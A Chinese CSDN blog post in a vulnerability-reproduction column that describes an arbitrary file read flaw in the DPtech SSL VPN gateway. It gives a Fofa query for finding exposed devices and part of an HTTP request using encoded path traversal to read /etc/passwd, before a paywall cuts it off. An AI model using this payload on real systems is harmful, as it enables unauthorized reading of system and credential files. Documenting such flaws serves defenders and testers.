迪普-SSL-VPN-任意文件读取

已于 2024-03-09 18:42:50 修改
阅读量242 收藏
点赞数
分类专栏: 漏洞复现 文章标签: web安全
于 2024-03-09 18:42:20 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43567873/article/details/136588690
版权
本文介绍了DPtech SSL VPN智能安全网关存在的任意文件读取漏洞,该漏洞可能导致攻击者通过恶意请求获取服务器上的任意文件。文章包含漏洞简介、复现过程及POC。
摘要由CSDN通过智能技术生成

简介

DPtech是在网络、安全及应用交付领域集研发、生产、销售于一体的高科技企业。DPtech VPN智能安全网关是迪普科技面向广域互联应用场景推出的专业安全网关产品,集成了IPSec、SSL、L2TP、GRE等多种VPN技术,支持国密算法,实现分支机构、移动办公人员的统一安全接入,提供内部业务跨互联网的安全访问。

漏洞简介

杭州迪普科技股份有限公司DPTech VPN Service 存在任意文件读取漏洞,攻击者可以构造恶意请求,通过漏洞读取服务器上的任意文件。
Fofa:

app="DPtech-SSLVPN"

漏洞复现

GET /..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: 
Cookie: SSLVPN_lang=1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: image/avif,image/webp,*/*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Sec-Fetch-Dest: image
Sec-Fetch-Mode:
了解本专栏 订阅专栏 解锁全文 超级会员免费看
今天晚上早睡觉
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
订阅专栏
【漏洞复现】迪普-SSL-VPN-任意文件读取
知黑而守白
01-18 164
DPtech VPN迪普科技面向广域互联应用场景推出的专业安全网关产品,集成了IPSec、SSL、L2TP、GRE等多种VPN技术,支持国密算法,实现分支机构、移动办公人员的统一安全接入,提供内部业务跨互联网的安全访问;支持基于用户、应用的安全策略,同时提供攻击防护、用户认证、行为审计、带宽管理、链路负载均衡等多种安全功能,可作为总部及分支机构的安全出口;除此以外,实现了集中管理、统一配置,并集成AC和PoE功能,支持3G/4G无线模块扩展,可有效的简化用户组网,降低运维成本。
【漏洞复现】DPTech VPN存在任意文件读取漏洞
失心少年
11-22 613
DPtech VPN智能安全网关是迪普科技面向广域互联应用场景推出的专业安全网关产品,集成了IPSec、SSL、L2TP、GRE等多种VPN技术,支持国密算法,实现分支机构、移动办公人员的统一安全接入,提供内部业务跨互联网的安全访问。技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。本文所提供的工具仅用于学习,禁止用于其他!
DPtech SSL VPN Service任意文件读取漏洞复现 [附POC]
薛定谔嘚喵博客
12-01 513
杭州迪普科技股份有限公司DPTech VPN 存在任意文件读取漏洞,攻击者可以构造恶意请求,通过漏洞读取服务器上的任意文件。这可能包括配置文件、敏感文档或其他敏感信息。成功利用此漏洞的攻击者可以获取系统敏感数据,可能导致横向扩展攻击、身份盗窃等风险。
漏洞复现--迪普DPTech VPN 任意文件读取
qq_53003652的博客
11-15 1109
杭州迪普科技股份有限公司DPTech VPN 存在任意文件读取漏洞,攻击者可以构造恶意请求,通过漏洞读取服务器上的任意文件
详解在linux上安装vpn客户端
点点关注不迷路
11-29 3750
详解在linux上安装vpn客户端
迪普防火墙白皮书
热门推荐
weixin_57914999的博客
04-06 1万+
应用防火墙 DPtech FW1000 系列下一代防火墙技术白皮书 1 概述 在应用需求的不断推动下,网络技术得到了飞速发展;而网络技术的进步则又反过来推动应用的发展, 应用与网络之间是相辅相成、相互促进的。随着万兆到核心/千兆到桌面、Web2.0、虚拟化、物联网、网 络音频/视频、P2P、云计算等各种新应用、新业务层出不穷,传统的基于端口进行应用识别和访问控制 的防火墙,已远远无法满足各种新应用下安全防护的需求。为解决此类难题,迪普科技推出了基于全新多 核处理器架构的 FW1000 系列下一代防火墙。 F
迪普防火墙FW1000-MA-N调试文档—20180823.docx
08-27
迪普FW1000-MA-N防火墙,该型号防火墙前面板共有8个以太网口,以太网口0~6一般做为业务口,7口做为以太网配置口,CONSOLE口为串口调试口,CONSOLE口需要通过串口线和超级终端进行调试,当以太网配置口的ip被修改或者...
Time-Series Prediction and Applications.
04-11
本书《时间序列预测与应用》由阿米特·科纳(Amit Konar)和迪普滕杜·巴塔查里亚(Diptendu Bhattacharya)撰写,旨在通过机器智能的方法深入探讨时间序列预测技术及其应用。 #### 时间序列的概念 时间序列是指...
意大利DUPLOMATIC迪普马SM-H-25伺服刀塔使用维护说明书
04-28
意大利DUPLOMATIC迪普马SM-H-25伺服刀塔使用维护说明书
迪普交换机使用手册
05-16
迪普lsw3000交换机使用手册,将就着看,也不是很多,如果有需要还可以联系我。
DPtech ADX3000-GC
03-29
根据提供的文件信息,我们可以详细解析并总结出关于DPtech ADX3000-GC应用交互交换网关的重要知识点。 ### 产品概述 DPtech ADX3000-GC应用交互交换网关是一款高性能、高可靠性的网络设备,旨在满足现代企业对于...
企业-迪普科技-2020年年终总结.rar
09-14
通过阅读这份名为“企业-迪普科技-2020年年终总结”的PDF文件,我们可以深入了解迪普科技在2020年的整体表现,从中获取到关于其业务模式、市场定位、技术创新以及未来规划等多方面的宝贵信息,对于理解这家公司在IT...
Goby内测版1.7.192 | 攻防实战Buff版
m0_46699477的博客
09-01 3083
上个攻防版发布后,表哥/表姐陆续反馈了一些在实际场景遇到问题,如深信服等VPN网卡无法识别、启动报错、扫描进程卡84%等等…对此,我们深表歉意,所以本次更新将重点解决无法扫描、漏洞误报及漏报等问题,并加强资产收集和漏洞利用模块。目标只有一个:拿分!拿分!!拿分!!!还是特么的拿分!!!! 文章看到底,找此版本的获取方式↓ 0x001 新增功能及优化 1. 新增插件 子域名爆破:子域名爆破往往是渗透测试的第一步,通过收集更多的子域名,获得更全面的资产信息,进而有助于对主站的渗透测试。这是众所周知的事情,表
网络安全设备常见弱口令
1stPeak's Blog
08-12 4602
网上总结一下网络安全设备常见默认口令,方便后续自己查看 安全设备 默认用户名 默认密码 深信服 sangfor sangforsangfor@2018sangfor@2019 深信服科技 AD dlanrecover 深信服负载均衡 AD 3.6 admin admin 深信服WAC ( WNS V2.6) admin admin 深信服VPN Admin Admin 深信服ipsec-VPN (SSL 5.5) Admin Admin 深信服A
网络安全(黑客)自学
白帽子凯哥聊黑客
08-20 716
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。无论网络、Web、移动、桌面、云等哪个领域,都有攻与防两面性,例如 Web安全技术,既有 Web 渗透,也有 Web 防御技术(WAF)。作为一个合格的网络安全工程师,应该做到攻守兼备,毕竟知己知彼,才能百战百胜。
网络安全(黑客)——自学2024
最新发布
2401_84466325的博客
08-21 1527
网络安全是一种综合性的概念,涵盖了保护计算机系统、网络基础设施和数据免受未经授权的访问、攻击、损害或盗窃的一系列措施和技术。经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。作为一个合格的网络安全工程师,应该做到攻守兼备,毕竟知己知彼,才能百战百胜。
从密码学角度看网络安全:加密技术的最新进展
A526847的博客
08-20 617
在数字化时代,网络安全已成为不可忽视的重大问题。随着计算机技术和网络应用的飞速发展,黑客和网络攻击手段日益复杂,对个人、企业乃至国家的信息安全构成了严重威胁。密码学作为网络安全领域的核心支柱,其发展对于保护信息安全具有至关重要的作用。本文将探讨加密技术的最新进展,以及这些进展如何助力网络安全
【网络安全】P2:访问控制失效
等风来
08-19 164
导致后面的任何功能都不需要电子邮件的验证,可能造成欺诈和伪造帐户、敏感信息泄露。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值